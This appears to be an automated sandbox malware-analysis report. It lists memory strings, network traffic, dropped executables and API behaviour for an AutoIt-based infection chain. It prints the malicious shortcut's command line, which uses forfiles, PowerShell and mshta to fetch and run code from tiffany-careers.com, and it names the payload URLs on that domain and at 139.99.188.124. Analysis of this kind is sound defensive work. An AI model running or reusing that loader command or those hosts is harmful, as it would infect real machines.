Source: powershell.exe, 00000012.00000002.2304075109.00000130E1558000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.11.drString found in binary or memory: http://139.99.188.124/QWCheljD.txt
Source: PefjSkkhb.exe, 0000000B.00000002.2238572807.000001A112952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/kiiMf
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2959000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.H
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000012.00000002.2302335696.00000130DF934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft7
Source: mshta.exe, 00000004.00000002.2280512235.000001D0EC614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270176062.000001D0EC613000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: svchost.exe, 00000005.00000002.3293299612.000001CFDD600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.9.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000006.00000002.2202478685.0000027015FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2C37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2166249488.0000027005F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000006.00000002.2166249488.000002700616A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000006.00000002.2166249488.000002700616A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/Marketing.pdf0
Source: powershell.exe, 00000006.00000002.2166249488.00000270063DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/PefjSkkhb.exep
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmp, SwiftWrite.pif, 00000018.00000000.2426079955.0000000000359000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000006.00000002.2166249488.0000027005F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E1331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000005.00000003.2082990781.000001CFDD410000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2BAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.2304075109.00000130E24AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000004.00000002.2280205979.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comh
Source: powershell.exe, 00000006.00000002.2202478685.0000027015FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E2C37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2394092266.00000130F13A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000002.2304075109.00000130E2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000004.00000002.2280205979.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000004.00000003.2277213025.000001D0EC570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2785000.00000004.00000020.00020000.00000000.sdmp, duyba.lnk.download.lnkString found in binary or memory: https://tiffany-careers.com/ghep2
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/ghep2$global:?
Source: mshta.exe, 00000004.00000002.2280075784.000001D0EC573000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277213025.000001D0EC570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2%
Source: mshta.exe, 00000004.00000003.2272974753.000001D8EE7AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE7AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273229589.000001D8EE7AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2281088808.000001D8EE7AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2...
Source: forfiles.exe, 00000000.00000002.2049373136.0000019BECEE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280293129.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2279706602.000001D0EC530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2273283593.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2276856139.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269204608.000001D0EC5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2C:
Source: mshta.exe, 00000004.00000002.2279297600.000001D0EC4C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2H
Source: mshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2Q
Source: mshta.exe, 00000004.00000003.2270292666.000001D8F2785000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2785000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2d8
Source: mshta.exe, 00000004.00000003.2274189869.000001D8F2935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2https://tiffany-careers.com/ghep2
Source: mshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2l
Source: mshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2o
Source: mshta.exe, 00000004.00000003.2269204608.000001D0EC5C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280174249.000001D0EC5C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2omQvj
Source: mshta.exe, 00000004.00000002.2280670724.000001D8EE70D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2s.LMEMHX
Source: mshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2t
Source: mshta.exe, 00000004.00000002.2279706602.000001D0EC538000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280000669.000001D0EC556000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277367980.000001D0EC556000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep2~
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000014.00000003.2314920403.00000000045BA000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.3293628451.0000000003841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00007FF7C0EE0A6C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00007FF7C0EE0D24
Source: C:\Users\Public\Guard.exeCode function: 20_2_00724830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_00724830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00304830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,24_2_00304830
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00007FF7C0EE0A6C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EC8B38 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,11_2_00007FF7C0EC8B38
Source: C:\Users\Public\Guard.exeCode function: 20_2_0073D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_0073D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_0031D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,24_2_0031D164

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 4308, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: powershell.exe, 00000006.00000002.2202478685.00000270161B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ce7ea808-4
Source: powershell.exe, 00000006.00000002.2202478685.00000270161B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_df658e6e-8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: This is a third-party compiled AutoIt script.11_2_00007FF7C0E537B0
Source: PefjSkkhb.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: PefjSkkhb.exe, 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_07a4e04f-2
Source: PefjSkkhb.exe, 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_97e5d35c-1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\PefjSkkhb.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: duyba.lnk.download.lnkLNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED3E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00007FF7C0ED3E20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EBCE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00007FF7C0EBCE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00007FF7C0ECD750
Source: C:\Users\Public\Guard.exeCode function: 20_2_00715778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,20_2_00715778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,24_2_002F5778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF84864420E6_2_00007FF84864420E
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EEF63011_2_00007FF7C0EEF630
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E7C13011_2_00007FF7C0E7C130
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E702C411_2_00007FF7C0E702C4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E9240011_2_00007FF7C0E92400
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E7C3FC11_2_00007FF7C0E7C3FC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED83D411_2_00007FF7C0ED83D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE836011_2_00007FF7C0EE8360
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE632011_2_00007FF7C0EE6320
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E7451411_2_00007FF7C0E74514
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E884C011_2_00007FF7C0E884C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EFA59C11_2_00007FF7C0EFA59C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EF055C11_2_00007FF7C0EF055C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EFC6D411_2_00007FF7C0EFC6D4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E967F011_2_00007FF7C0E967F0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E8A8A011_2_00007FF7C0E8A8A0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EF0AEC11_2_00007FF7C0EF0AEC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E52AE011_2_00007FF7C0E52AE0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE6C3411_2_00007FF7C0EE6C34
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E96DE411_2_00007FF7C0E96DE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E92D2011_2_00007FF7C0E92D20
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EFCE8C11_2_00007FF7C0EFCE8C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E70E9011_2_00007FF7C0E70E90
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E60E7011_2_00007FF7C0E60E70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E62E3011_2_00007FF7C0E62E30
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E830DC11_2_00007FF7C0E830DC
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EE32AC11_2_00007FF7C0EE32AC
